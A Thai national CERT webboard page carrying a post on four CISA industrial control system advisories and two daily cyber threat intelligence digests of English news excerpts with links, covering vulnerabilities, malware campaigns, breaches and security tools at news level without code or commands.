NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ
    1. หน้าแรก
    2. NCSA_THAICERT
    3. กระทู้
    • รายละเอียด
    • ติดตาม 0
    • คนติดตาม 2
    • กระทู้ 1,321
    • กระทู้ 1,322
    • ดีที่สุด 0
    • Controversial 0
    • กลุ่ม 2

    โพสต์ถูกสร้างโดย NCSA_THAICERT

    • CISA ออกคำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม 4 รายการ

      Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม (ICS) 4 รายการ เมื่อวันที่ 3 กรกฎาคม 2568 ซึ่งคำแนะนำเหล่านี้ให้ข้อมูลที่ทันท่วงทีเกี่ยวกับปัญหาด้านความปลอดภัยช่องโหว่ และช่องโหว่ที่อยู่รอบ ๆ ICS ในปัจจุบัน มีดังต่อไปนี้

      • ICSA-25-184-01 Hitachi Energy Relion 670/650 and SAM600-IO Series
      • ICSA-25-184-02 Hitachi Energy MicroSCADA X SYS600
      • ICSA-25-184-03 Mitsubishi Electric MELSOFT Update Manager
      • ICSA-25-184-04 Mitsubishi Electric MELSEC iQ-F Series

      ทั้งนี้ CISA สนับสนุนให้ผู้ใช้และผู้ดูแลระบบตรวจสอบคำแนะนำ ICS ที่เผยแพร่ใหม่สำหรับรายละเอียดทางเทคนิคและการบรรเทาผลกระทบ รายละเอียดเพิ่มเติมที่ https://www.cisa.gov/news-events/alerts/2025/07/03/cisa-releases-four-industrial-control-systems-advisories

      อ้างอิง
      https://www.cisa.gov/news-events/alerts/2025/07/03/cisa-releases-four-industrial-control-systems-advisories
      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand ac4c0e83-460f-4788-91c7-c779e41341e2-image.png

      โพสต์ใน OT Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • Cyber Threat Intelligence 04 July 2025

      Healthcare Sector

      • Healthcare CISOs Must Secure More Than What’s Regulated
        "In this Help Net Security interview, Henry Jiang, CISO at Ensora Health, discusses what it really takes to make DevSecOps work in healthcare. He explains how balancing speed and security isn’t easy and why aligning with regulations is key. Jiang also shares tips on working with engineering teams and how automation helps in DevSecOps."
        https://www.helpnetsecurity.com/2025/07/03/henry-jiang-ensora-health-healthcare-devsecops-strategy/

      Industrial Sector

      • Industrial Security Is On Shaky Ground And Leaders Need To Pay Attention
        "44% of industrial organizations claim to have strong real-time cyber visibility, but nearly 60% have low to no confidence in their OT and IoT threat detection capabilities, according to Forescout. Digitalization has increased connectivity across devices, transforming industrial environments, which in turn increases cyber risk. Rising geopolitical tensions further compound these challenges, demanding more nuanced, strategic and integrated security approaches to protect critical assets while maintaining operations."
        https://www.helpnetsecurity.com/2025/07/03/ot-iot-threat-detection-confidence/
      • Hitachi Energy Relion 670/650 And SAM600-IO Series
        "An authenticated user with file access privilege via FTP access can cause the Relion 670/650 and SAM600-IO series device to reboot due to improper disk space management."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-184-01
      • Hitachi Energy MicroSCADA X SYS600
        "Successful exploitation of these vulnerabilities could allow an attacker to tamper with the system file, overwrite files, create a denial-of-service condition, or leak file content."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-184-02
      • Mitsubishi Electric MELSOFT Update Manager
        "Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code, disclose information, alter information, or cause a denial-of-service (DoS) condition."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-184-03
      • Mitsubishi Electric MELSEC iQ-F Series
        "Successful exploitation of this vulnerability could result in a denial-of-service condition for legitimate users for a certain period by repeatedly attempting to log in with incorrect passwords. When the product repeatedly receives unauthorized logins from an attacker, legitimate users will be unable to be authenticated until a certain period has passed after the lockout or until the product is reset."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-184-04
      • OT Security In Ports: Lessons From The Coast Guard's Latest Warning
        "The cranes that move goods in and out of America's busiest ports (some of the most essential components of our national logistics chain) are under growing scrutiny. In a newly issued MARSEC Directive 105-5, the U.S. Coast Guard has raised red flags about the cybersecurity risks that come with ship-to-shore (STS) cranes manufactured in China. These cranes, mostly produced by state-owned enterprises like Shanghai Zhenhua Heavy Industries (ZPMC), make up nearly 80% of the STS equipment at U.S. ports."
        https://www.tripwire.com/state-of-security/ot-security-ports-lessons-coast-guards-latest-warning

      New Tooling

      • GitPhish: Open-Source GitHub Device Code Flow Security Assessment Tool
        "GitPhish is an open-source security research tool built to replicate GitHub’s device code authentication flow. It features three core operating modes: an authentication server, automated landing page deployment, and an administrative management interface. GitPhish can be accessed via a command-line interface or a web dashboard, offering comprehensive features such as logging, analytics, and token management."
        https://www.helpnetsecurity.com/2025/07/03/gitphish-open-source-github-device-code-flow-security-assessment-tool/
        https://github.com/praetorian-inc/GitPhish

      Vulnerabilities

      • Grafana Releases Critical Security Update For Image Renderer Plugin
        "Grafana Labs has addressed four Chromium vulnerabilities in critical security updates for the Grafana Image Renderer plugin and Synthetic Monitoring Agent. Although the issues impact Chromium and were fixed by the open-source project two weeks ago, Grafana received a bug bounty submission from security researcher Alex Chapman proving their exploitability in the Grafana components. Grafana describes the update as a "critical severity security release" and advises users to apply the fixes for the vulnerabilities below as soon as possible:"
        https://www.bleepingcomputer.com/news/security/grafana-releases-critical-security-update-for-image-renderer-plugin/
      • Apache Under The Lens: Tomcat’s Partial PUT And Camel’s Header Hijack
        "In March 2025, Apache disclosed CVE-2025-24813, a vulnerability impacting Apache Tomcat. This is a widely used platform that allows Apache web servers to run Java-based web applications. The flaw allows remote code execution, affecting Apache Tomcat versions 9.0.0.M1 to 9.0.98, 10.1.0-M1 to 10.1.34 and 11.0.0-M1 to 11.0.2. The same month, Apache revealed two additional vulnerabilities in Apache Camel, a message routing middleware framework. These vulnerabilities are CVE-2025-27636 and CVE-2025-29891, two flaws that allow remote code execution, affecting Apache Camel versions 4.10.0 to 4.10.1, 4.8.0 to 4.8.4 and 3.10.0 to 3.22.3."
        https://unit42.paloaltonetworks.com/apache-cve-2025-24813-cve-2025-27636-cve-2025-29891/
      • Azure Machine Learning Escalation: When Pipelines Go Off The Rails
        "Orca has discovered a new privilege escalation vulnerability in the Azure Machine Learning service. We found that invoker scripts that are automatically created for each AML pipeline component and stored in a linked Storage Account can be abused to execute code with elevated privileges. While the severity varies based on the identity assigned to the compute instance, this enables multiple escalation paths when the instance runs under a highly privileged managed identity."
        https://orca.security/resources/blog/azure-machine-learning-privilege-escalation/
        https://www.infosecurity-magazine.com/news/privilege-escalation-flaw-azure-ml/

      Malware

      • Hunters International Ransomware Shuts Down, Releases Free Decryptors
        "The Hunters International Ransomware-as-a-Service (RaaS) operation announced today that it has officially closed down its operations and will offer free decryptors to help victims recover their data without paying a ransom. "After careful consideration and in light of recent developments, we have decided to close the Hunters International project. This decision was not made lightly, and we recognize the impact it has on the organizations we have interacted with," the cybercrime gang says in a statement published on its dark web leak earlier today. "As a gesture of goodwill and to assist those affected by our previous activities, we are offering free decryption software to all companies that have been impacted by our ransomware. Our goal is to ensure that you can recover your encrypted data without the burden of paying ransoms.""
        https://www.bleepingcomputer.com/news/security/hunters-international-ransomware-shuts-down-after-world-leaks-rebrand/
        https://therecord.media/hunters-international-ransomware-extortion-group-claims-shutdown
        https://www.bankinfosecurity.com/ransomware-group-hunters-international-announces-exit-a-28894
        https://www.theregister.com/2025/07/03/hunters_international_shutdown/
      • The SOC Case Files: XDR Contains Two Nearly Identical Attacks Leveraging ScreenConnect
        "Barracuda’s Managed XDR team recently helped two companies mitigate incidents where attackers had managed to compromise computers and install rogue ScreenConnect remote management software. The incidents were neutralized before the attackers were able to move laterally through the network."
        https://blog.barracuda.com/2025/07/02/soc-case-files-xdr-contains-two-attacks-screenconnect
      • RondoDox Unveiled: Breaking Down a New Botnet Threat
        "Over the past month, FortiGuard Labs has observed a significant increase in scanning activity, including a new botnet campaign that exploits two high-risk vulnerabilities: CVE-2024-3721 and CVE-2024-12856. Both have been publicly disclosed and are actively being targeted, posing serious risks to device security and overall network integrity."
        https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat
      • Satori Threat Intelligence Alert: IconAds Conceals Source Of Ad Fraud From Users
        "HUMAN’s Satori Threat Intelligence and Research Team has uncovered and disrupted an operation dubbed IconAds. This scheme centered on a collection of 352 apps which load out-of-context ads on a user’s screen and hide the app icons, making it difficult for a user to identify the culprit app and remove it. At its peak, IconAds accounted for 1.2 billion bid requests a day."
        https://www.humansecurity.com/learn/blog/satori-threat-intelligence-alert-iconads/
        https://thehackernews.com/2025/07/mobile-security-alert-352-iconads-fraud.html
      • Two New Pro-Russian Hacktivist Groups Target Ukraine, Recruit Insiders
        "Two new pro-Russian hacktivist groups have emerged in recent months to mount cyberattacks on Ukraine and its allies. The groups, calling themselves IT Army of Russia and TwoNet, use the Telegram messaging app to coordinate operations, recruit insiders and collect information about targets in Ukraine, according to a new report by cybersecurity firm Intel 471. Researchers said both groups appeared earlier this year and may be rebrands of previously known threat actors, though their exact links to past campaigns remain unclear."
        https://therecord.media/twonet-it-army-of-russia-new-hacktivist-groups-target-ukraine

      Breaches/Hacks/Leaks

      • IdeaLab Confirms Data Stolen In Ransomware Attack Last Year
        "IdeaLab is notifying individuals impacted by a data breach incident last October when hackers accessed sensitive information. Although the organization does not describe the type of attack, the Hunters International ransomware group has claimed the breach and leaked the stolen data on the dark web. IdeaLab is a California-based technology startup incubator that since 1996 has launched over 150 companies, including GoTo.com, CitySeach, eToys, Authy, Pet.net, Heliogen, and Energy Vault."
        https://www.bleepingcomputer.com/news/security/idealab-confirms-data-stolen-in-ransomware-attack-last-year/
      • Taking Over 60k Spyware User Accounts With SQL Injection
        "Recently I was looking through a database of known stalkerware services and found one I wasn’t familiar with: Catwatchful. It seemed to be a full-featured Android spy app, to actually be its own service as opposed to a millionth FlexiSpy reseller, and to offer a 3-day free trial. Aside from a boilerplate disclaimer to only use it with consent, it also pretty brazenly advertised itself as stalkerware in the FAQ:"
        https://ericdaigle.ca/posts/taking-over-60k-spyware-user-accounts/
        https://www.securityweek.com/undetectable-android-spyware-backfires-leaks-62000-user-logins/
        https://www.malwarebytes.com/blog/news/2025/07/catwatchful-child-monitoring-app-exposes-victims-data
      • Cybercriminals Target Brazil: 248,725 Exposed In CIEE One Data Breach
        "Yesterday, July 1, 2025 — the actor under the alias "888" published over 248,725 records containing sensitive PII stolen from CIEE (Centro de Integração Empresa-Escola). ONE CIEE is a personalized recruitment and selection service offered by CIEE Centro de Integração Empresa-Escola (Business-School Integration Center) for companies seeking candidates for internships and apprenticeship programs. It connects specialists and businesses, ranging from major international corporations to local entities in Brazil."
        https://www.resecurity.com/blog/article/cybercriminals-target-brazil-248725-exposed-in-ciee-one-data-breach
        https://securityaffairs.com/179609/data-breach/cybercriminals-target-brazil-248725-exposed-in-ciee-one-data-breach.html
      • Virginia County Says April Ransomware Attack Exposed Employee SSNs
        "Government employees working for the county of Gloucester in Virginia had Social Security numbers and other sensitive data stolen during a ransomware attack in April. The county sent 3,527 current and former employees notices this week warning that their personal information was accessed by hackers who breached county systems on April 22. In addition to Social Security numbers, names, driver’s license numbers, bank account information, health insurance numbers and medical information was also stolen during the incident."
        https://therecord.media/virginia-county-says-ransomware-attack-exposed-ssns
      • Young Consulting Finds Even More Folks Affected In Breach Mess – Now Over 1 Million
        "Young Consulting's cybersecurity woes continue after the number of affected individuals from last year's suspected ransomware raid passed the 1 million mark. The software vendor to stop-loss insurance carriers, now trading as Connexure, said the attack took place sometime between April 10 and 13, 2024, in a data breach notice that remains on its website homepage today. Young Consulting did not mention that ransomware was involved, although the BlackSuit group took credit for the attack, which was also widely reported as a ransomware incident."
        https://www.theregister.com/2025/07/03/young_consulting_breach_million/

      General News

      • Cyberattacks Are Draining Millions From The Hospitality Industry
        "Every day, millions of travelers share sensitive information like passports, credit card numbers, and personal details with hotels, restaurants, and travel services. This puts pressure on the hospitality sector to keep that information safe and private. The industry itself is booming. The hotel segment alone is expected to reach a new peak of $511.91 billion in 2029. It’s no surprise that cybercriminals are taking notice."
        https://www.helpnetsecurity.com/2025/07/03/hospitality-industry-cybersecurity-challenges/
      • AI Tools Are Everywhere, And Most Are Off Your Radar
        "80% of AI tools used by employees go unmanaged by IT or security teams, according to Zluri’s The State of AI in the Workplace 2025 report. AI is popping up all over the workplace, often without anyone noticing. If you’re a CISO, if you want to avoid blind spots and data risks, you need to know where AI is showing up and what it’s doing across the entire organization."
        https://www.helpnetsecurity.com/2025/07/03/shadow-ai-tools-workplace/
      • 90% Aren’t Ready For AI Attacks, Are You?
        "As AI reshapes business, 90% of organizations are not adequately prepared to secure their AI-driven future, according to a new report from Accenture. Globally, 63% of companies are in the “Exposed Zone,” indicating they lack both a cohesive cybersecurity strategy and necessary technical capabilities. The report reveals AI adoption has accelerated the speed, scale and sophistication of cyber threats, far outpacing current enterprise cyber defenses. For example, 77% of organizations lack the essential data and AI security practices needed to protect critical business models, data pipelines and cloud infrastructure."
        https://www.helpnetsecurity.com/2025/07/03/ai-cyber-defenses/
      • Police Dismantles Investment Fraud Ring Stealing €10 Million
        "The Spanish police have dismantled a large-scale investment fraud operation that caused cumulative damages exceeding $11.8 million (€10 million). During simultaneous raids in Barcelona, Madrid, Mallorca, and Alicante, coordinated by the Mossos d’Esquadra, Civil Guard, and the National Police, 21 individuals were arrested. Along with the arrests, the police agents also confiscated seven luxury vehicles and more than $1.5 million €1.3 million in cash and cryptocurrency."
        https://www.bleepingcomputer.com/news/legal/police-dismantles-investment-fraud-ring-stealing-10-million/
      • Amazon Prime Day 2025: Deals Await, But So Do The Cyber Criminals
        "Ahead of this year’s Amazon Prime Day 2025 on July 8th, shoppers worldwide are preparing their wish lists. So are cyber criminals. Phishing attacks are already targeting innocent shoppers. In June alone, over 1,000 new domains with names resembling Amazon appeared online. Alarmingly, 87% of these have already been flagged as malicious or suspicious. Many of the domains include the term “Amazon Prime”, with one in every 81 of the risky domains containing this phrase."
        https://blog.checkpoint.com/research/amazon-prime-day-2025-deals-await-but-so-do-the-cyber-criminals-2/
      • New Cyber Blueprint Aims To Guide Organizations On AI Journey
        "Executive leadership is pushing for rapid artificial intelligence (AI) adoption inside their organizations to offset cyber-workforce shortages or to enhance threat detection and incident response capabilities, but lack of preparation can introduce problems. To address the issue, Deloitte HAS published a new Cyber AI blueprint to provide organizations with a template how to design, build, and deploy AI tools. The blueprint consists of an AI operating model, a governance model, and a reference architecture to help organizations design and operate an AI-powered environment, including agentic AI applications. The blueprint also includes elements to help organizations update the workforce's skills to handle the changes posed by the new AI-enhanced environment."
        https://www.darkreading.com/cyber-risk/cyber-blueprint-guide-ai-journey
      • Criminals Sending QR Codes In Phishing, Malware Campaigns
        "That email advertising a great deal on an inflatable pool to cool off with during this sweltering July may come with a nifty QR code to simplify the buying process. Or you find a QR code touting a special sale on fireworks for the holiday weekend. These QR codes look harmless, but attackers are increasingly using them for malicious purposes. In an analysis of phishing and other malicious activities associated with identity theft between October 2024 and March 2025, the Anti-Phishing Working Group (APWG) found that criminals are sending millions of emails each day containing QR codes that lead victims to phishing sites, brand impersonation pages, and other fraudulent scam sites. Over this six-month period, email security company and APWG member Mimecast detected 1.7 million malicious QR codes and an average of 2.7 million emails with QR codes attached daily, according to APWG's "Phishing Activity Trends Report.""
        https://www.darkreading.com/endpoint-security/criminals-send-qr-codes-phishing
      • Dark Web Vendors Shift To Third Parties, Supply Chains
        "Cyberattackers continue to attack a variety of technology supply chains — from open source software components to managed service providers — and increasingly, they are advertising their windfalls on Dark Web forums. In March, for example, a threat actor posted details of an alleged compromise of Oracle Cloud to the BreachForums Dark Web site. The compromise — initially denied by Oracle — led to Oracle later notifying customers of a breach of two servers containing usernames and passwords. The hacker who originally posted information of the attack, "rose87169," had published some information in the hope of attracting collaborators to decrypt some of the data."
        https://www.darkreading.com/threat-intelligence/dark-web-vendors-third-parties-supply-chains
      • AI Tackles Binary Code Challenges To Fortify Supply Chain Security
        "Artificial intelligence (AI) can help improve binary code analysis and, in turn, make the software supply chain more secure. Effective binary code analysis is paramount as supply chain risks rise. Vendor and government-backed initiatives introduced over the past two years, such as the Cybersecurity and Infrastructure Security Agency's Secure by Design pledge, accentuate how pervasive software supply chain security threats have grown. It's a result of how digitally interconnected organizations have become. However, it's difficult to account for every link in the chain — some prioritize security, while others exhibit dangerous shortcomings."
        https://www.darkreading.com/application-security/ai-tackles-binary-code-challenges-fortify-supply-chain-security
      • Browser Extensions Pose Heightened, But Manageable, Security Risks
        "While browser extensions add useful functionality to Web browsers, such as blocking ads, managing passwords, and taking notes, they also increase the organization's security and privacy risks. Browser extensions require certain levels of permissions that are attractive to attackers. Some extensions need access to the user's location, browsing history, or the user's clipboard to see what data the user has copied. Some extensions go further, requesting access to nearly all of the data stored on the user's computer as well as the data accessed while visiting different websites. Attackers can exploit extensions with these heightened permissions to access potentially sensitive information, such as Web traffic, saved credentials, and session cookies."
        https://www.darkreading.com/cyber-risk/browser-extensions-heightened-manageable-security-risks
      • CVE Program Launches Two New Forums To Enhance CVE Utilization
        "The Board of the Common Vulnerabilities and Exposures (CVE) Program has launched two new forums to encourage more contributions and shape the future of the initiative. The CVE Program, run by the nonprofit MITRE and sponsored by the US Cybersecurity and Infrastructure Security Agency (CISA), faced uncertainty about its future in April after its contract expired. The contract was subsequently extended for 11 months, according to reports. While the longer-term future of the program remains uncertain beyond this period, the CVE Board appears to be willing to allow more stakeholders to have a voice and shape the program’s strategy."
      • **https://www.infosecurity-magazine.com/news/cve-program-new-user-researcher/
      • INTERPOL Releases New Information On Globalization Of Scam Centres**
        "Human trafficking-fueled scam centres have expanded their global footprint, according to a new crime trend update released by INTERPOL. As of March 2025, victims from 66 countries were trafficked into online scam centres, with no continent left untouched. Seventy-four percent of human trafficking victims were brought to centres in the original ‘hub’ region of Southeast Asia, according to analysis of the crime trend using data from relevant INTERPOL Notices issued in the past five years."
        https://www.interpol.int/en/News-and-Events/News/2025/INTERPOL-releases-new-information-on-globalization-of-scam-centres
        https://therecord.media/interpol-west-africa-cybercrime-compounds
      • Russia Jails Man For 16 Years Over Pro-Ukraine Cyberattacks On Critical Infrastructure
        "A Russian court has sentenced a man to 16 years in a high-security penal colony for launching cyberattacks that disrupted critical infrastructure, authorities said on Wednesday. Andrei Smirnov, a resident of the Siberian city of Belovo, was detained in October 2023 and charged with treason. Prosecutors said he held pro-Ukrainian views and joined a hacker group allegedly acting in the interests of Ukrainian intelligence. According to their investigation, Smirnov used malware to attack Russian information systems in 2022, blocking access to websites of several local companies and damaging critical infrastructure. Russian authorities did not specify which infrastructure or companies were affected."
        https://therecord.media/russia-jails-man-over-pro-ukraine-cyberattacks
      • Ransomware And Cyber Extortion In Q2 2025
        "The decline of legacy ransomware groups has created a vacuum that’s quickly been filled by emerging groups like “Qilin.” Nonetheless, this quarter still saw a 31% decrease in named victims compared to the previous quarter. Leading ransomware-as-a-service (RaaS) groups like Qilin and “Akira” rely on the mass exploitation of vulnerabilities to compromise organizations with speed and precision. Future ransomware leaders are likely to succeed by combining automated discovery tools with public proof-of-concept (POC) exploits, accelerating compromises and propelling them to the forefront of the ransomware race. To counter these threats, organizations must prioritize asset discovery and implement a strict patch management framework to ensure exposed and critical devices cannot be exploited by ransomware actors."
        https://reliaquest.com/blog/ransomware-cyber-extortion-threat-intel-q2-2025/
        https://www.infosecurity-magazine.com/news/automation-vulnerability/

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) d56bbf83-43e3-4ef4-9dd4-b1feb78d94ec-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • Cyber Threat Intelligence 03 July 2025

      Financial Sector

      • How FinTechs Are Turning GRC Into a Strategic Enabler
        "In this Help Net Security interview, Alexander Clemm, Corp GRC Lead, Group CISO, and BCO at Riverty, shares how the GRC landscape for FinTechs has matured in response to tighter regulations and global growth. He discusses the impact of frameworks like DORA and the EU AI Act, and reflects on building a culture where compliance supports, rather than slows, business progress."
        https://www.helpnetsecurity.com/2025/07/02/alexander-clemm-riverty-fintechs-grc-landscape/

      New Tooling

      • Secretless Broker: Open-Source Tool Connects Apps Securely Without Passwords Or Keys
        "Secretless Broker is an open-source connection broker that eliminates the need for client applications to manage secrets when accessing target services like databases, web services, SSH endpoints, or other TCP-based systems."
        https://www.helpnetsecurity.com/2025/07/02/secretless-broker-open-source-tool-connects-apps-securely/
        https://github.com/cyberark/secretless-broker

      Vulnerabilities

      • Cisco Warns That Unified CM Has Hardcoded Root SSH Credentials
        "Cisco has removed a backdoor account from its Unified Communications Manager (Unified CM), which would have allowed remote attackers to log in to unpatched devices with root privileges. Cisco Unified Communications Manager (CUCM), formerly known as Cisco CallManager, serves as the central control system for Cisco's IP telephony systems, handling call routing, device management, and telephony features. The vulnerability (tracked as CVE-2025-20309) was rated as maximum severity, and it is caused by static user credentials for the root account, which were intended for use during development and testing."
        https://www.bleepingcomputer.com/news/security/cisco-removes-unified-cm-callManager-backdoor-root-account/
        https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssh-m4UBdpE7
        https://securityaffairs.com/179577/security/cisco-removed-the-backdoor-account-from-its-unified-communications-manager.html
        https://www.theregister.com/2025/07/02/cisco_patch_cvss/
      • 600,000 WordPress Sites Affected By Arbitrary File Deletion Vulnerability In Forminator WordPress Plugin
        "On June 20th, 2025, we received a submission for an Arbitrary File Deletion vulnerability in Forminator, a WordPress plugin with more than 600,000 active installations. This vulnerability makes it possible for unauthenticated threat actors to specify arbitrary file paths in a form submission, and the file will be deleted when the submission is deleted. It can be leveraged to delete critical files like wp-config.php, which can lead to remote code execution. Props to Phat RiO – BlueRock who discovered and responsibly reported this vulnerability through the Wordfence Bug Bounty Program. This researcher earned a bounty of $8,100.00 for this discovery, the top bounty awarded through our program so far."
        https://www.wordfence.com/blog/2025/07/600000-wordpress-sites-affected-by-arbitrary-file-deletion-vulnerability-in-forminator-wordpress-plugin/
        https://www.bleepingcomputer.com/news/security/forminator-plugin-flaw-exposes-wordpress-sites-to-takeover-attacks/
        https://www.securityweek.com/forminator-wordpress-plugin-vulnerability-exposes-400000-websites-to-takeover/
      • CISA Adds One Known Exploited Vulnerability To Catalog
        "CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2025-6554 Google Chromium V8 Type Confusion Vulnerability"
        https://www.cisa.gov/news-events/alerts/2025/07/02/cisa-adds-one-known-exploited-vulnerability-catalog

      Malware

      • Analysis Of Attacks Targeting Linux SSH Servers For Proxy Installation
        "AhnLab SEcurity intelligence Center (ASEC) monitors attacks targeting Linux servers that are inappropriately managed using honeypots. One of the representative honeypots is the SSH service that uses weak credentials, which is targeted by a large number of DDoS and coinminer attackers. ASEC has identified cases where Linux servers were attacked to install proxies. In each case, TinyProxy or Sing-box was installed. No other attack logs were found except for the installation of TinyProxy or Sing-box. It appears that the attackers aim to use the infected systems as proxy nodes."
        https://asec.ahnlab.com/en/88749/
      • DCRAT Impersonating The Colombian Government
        "The FortiMail IR team recently uncovered a new email attack distributing a Remote Access Trojan called DCRAT. The threat actor is impersonating a Colombian government entity to target organizations in Colombia. The threat actor uses multiple techniques, such as a password protected archive, obfuscation, steganography, base64 encoding, and multiple file drops, to evade detection."
        https://www.fortinet.com/blog/threat-research/dcrat-impersonating-the-columbian-government
      • June's Dark Gift: The Rise Of Qwizzserial
        "Discovered by Group-IB in mid-2024, the Qwizzserial, which was initially not very active, began to spread strongly in Uzbekistan, masquerading as legitimate applications. The malware steals banking information and intercepts 2FA sms, transmitting it to fraudsters via Telegram bots."
        https://www.group-ib.com/blog/rise-of-qwizzserial/
        https://www.infosecurity-magazine.com/news/android-sms-stealer-100000/
      • Okta Observes v0 AI Tool Used To Build Phishing Sites
        "Okta Threat Intelligence has observed threat actors abusing v0, a breakthrough Generative Artificial Intelligence (GenAI) tool created by Vercel, to develop phishing sites that impersonate legitimate sign-in webpages. This observation signals a new evolution in the weaponization of Generative AI by threat actors who have demonstrated an ability to generate a functional phishing site from simple text prompts. Okta researchers were able to reproduce our observations."
        https://www.okta.com/newsroom/articles/okta-observes-v0-ai-tool-used-to-build-phishing-sites/
        https://thehackernews.com/2025/07/vercels-v0-ai-tool-weaponized-by.html
      • MacOS NimDoor | DPRK Threat Actors Target Web3 And Crypto Platforms With Nim-Based Malware
        "In April 2025, Huntabil.IT observed a targeted attack on a Web3 startup, attributing the incident to a DPRK threat actor group. Several reports on social media at the time described similar incidents at other Web3 and Crypto organizations. Analysis revealed an attack chain consisting of an eclectic mix of scripts and binaries written in AppleScript, C++ and Nim. Although the early stages of the attack follow a familiar DPRK pattern using social engineering, lure scripts and fake updates, the use of Nim-compiled binaries on macOS is a more unusual choice. A report by Huntress in mid-June described a similar initial attack chain as observed by Huntabil.IT, albeit using different later stage payloads."
        https://www.sentinelone.com/labs/macos-nimdoor-dprk-threat-actors-target-web3-and-crypto-platforms-with-nim-based-malware/
        https://www.bleepingcomputer.com/news/security/nimdoor-crypto-theft-macos-malware-revives-itself-when-killed/
        https://thehackernews.com/2025/07/north-korean-hackers-target-web3-with.html
      • FoxyWallet: 40+ Malicious Firefox Extensions Exposed
        "A large-scale malicious campaign has been uncovered involving dozens of fake Firefox extensions designed to steal cryptocurrency wallet credentials. These extensions impersonate legitimate wallet tools from widely-used platforms such as Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, MyMonero, Bitget, Leap, Ethereum Wallet, and Filfox. Once installed, the malicious extensions silently exfiltrate wallet secrets, putting users’ assets at immediate risk. So far, we were able to link to over 40 different extensions to this campaign, which is still ongoing and very much alive — some extensions are still available on the marketplace. The linkage was done through a meticulous effort of discovering shared TTPs and infrastructure."
        https://blog.koi.security/foxywallet-40-malicious-firefox-extensions-exposed-4c14419de486
        https://www.bleepingcomputer.com/news/security/dozens-of-fake-wallet-add-ons-flood-firefox-store-to-drain-crypto/
      • French Cybersecurity Agency Confirms Government Affected By Ivanti Hacks
        "France’s cybersecurity agency reported on Tuesday that a range of government, utility and private sector entities in the country were impacted by a hacking campaign last year exploiting multiple zero-day vulnerabilities in an Ivanti appliance. The campaign, which had prompted a warning in September by U.S. cybersecurity authorities, targeted the Ivanti Cloud Service Appliance — a bit of software that connects on-premise networks with cloud-based services. In France, the hacking campaign targeted “organizations from governmental, telecommunications, media, finance, and transport sectors,” stated the report from ANSSI — the Agence Nationale de la Sécurité des Systèmes d’Information (the National Agency for the Security of Information Systems) — exploiting bugs tracked as CVE-2024-8190, CVE-2024-8963, and CVE-2024-9380."
        https://therecord.media/france-anssi-report-ivanti-bugs-exploited
        https://www.cert.ssi.gouv.fr/uploads/CERTFR-2025-CTI-009.pdf
        https://www.darkreading.com/cyber-risk/initial-access-broker-self-patches-zero-days
        https://www.bankinfosecurity.com/chinese-hackers-exploited-ivanti-flaw-in-france-a-28888
        https://www.infosecurity-magazine.com/news/chinese-hackers-france-ivanti/
      • PDFs: Portable Documents, Or Perfect Deliveries For Phish?
        "The portable document format (PDF) is a standard method for sharing information electronically. Files created in other applications (e.g., Microsoft Word) are often converted into this format, which can then be viewed using PDF rendering applications like Adobe Reader, commonly available on most OSs. Thanks to its excellent portability, this file format is widely used for the mass distribution of documents to large audiences. However, in recent months, it has also been exploited for illegitimate purposes, such as brand impersonation."
        https://blog.talosintelligence.com/pdfs-portable-documents-or-perfect-deliveries-for-phish/
        https://thehackernews.com/2025/07/hackers-using-pdfs-to-impersonate.html
      • Jasper Sleet: North Korean Remote IT Workers’ Evolving Tactics To Infiltrate Organizations
        "Since 2024, Microsoft Threat Intelligence has observed remote information technology (IT) workers deployed by North Korea leveraging AI to improve the scale and sophistication of their operations, steal data, and generate revenue for the Democratic People’s Republic of Korea (DPRK). Among the changes noted in the North Korean remote IT worker tactics, techniques, and procedures (TTPs) include the use of AI tools to replace images in stolen employment and identity documents and enhance North Korean IT worker photos to make them appear more professional. We’ve also observed that they’ve been utilizing voice-changing software."
        https://www.microsoft.com/en-us/security/blog/2025/06/30/jasper-sleet-north-korean-remote-it-workers-evolving-tactics-to-infiltrate-organizations/
        https://www.darkreading.com/cyberattacks-data-breaches/scope-scale-spurious-north-korean-it-workers
        Silent Push Uncovers Chinese Fake Marketplace e-Commerce Phishing Campaign Using Thousands Of Websites To * Spoof Popular Retail Brands
        "From a lead gained through a recent X/Twitter post by Mexican journalist Ignacio Gómez Villaseñor, Silent Push Threat Analysts have been investigating a new phishing e-commerce website scam campaign. The original campaign observed was targeting Spanish-language visitors shopping for the “Hot Sale 2025.” The research by Gómez Villaseñor focused on specific domains found on one IP address targeting Spanish-language audiences; however, it was but one slice of a much larger campaign."
        https://www.silentpush.com/blog/fake-marketplace/
        https://therecord.media/china-linked-hackers-website-phishing
      • Cl0p Cybercrime Gang's Data Exfiltration Tool Found Vulnerable To RCE Attacks
        "Security experts have uncovered a hole in Cl0p's data exfiltration tool that could potentially leave the cybercrime group vulnerable to attack. The vulnerability in the Python-based software, which was used in the 2023-2024 MOVEit mass data raids, was discovered by Italian researcher Lorenzo N and published by the Computer Incident Response Center Luxembourg (CIRCL). Classed as an improper input validation (CWE-20) bug, the flaw with an 8.9 severity score is underpinned by a lack of input sanitization, which results in the tool constructing OS commands by concatenating attacker-supplied strings."
        https://www.theregister.com/2025/07/02/cl0p_rce_vulnerability/
        https://vulnerability.circl.lu/vuln/gcve-1-2025-0002
      • Windows Shortcut (LNK) Malware Strategies
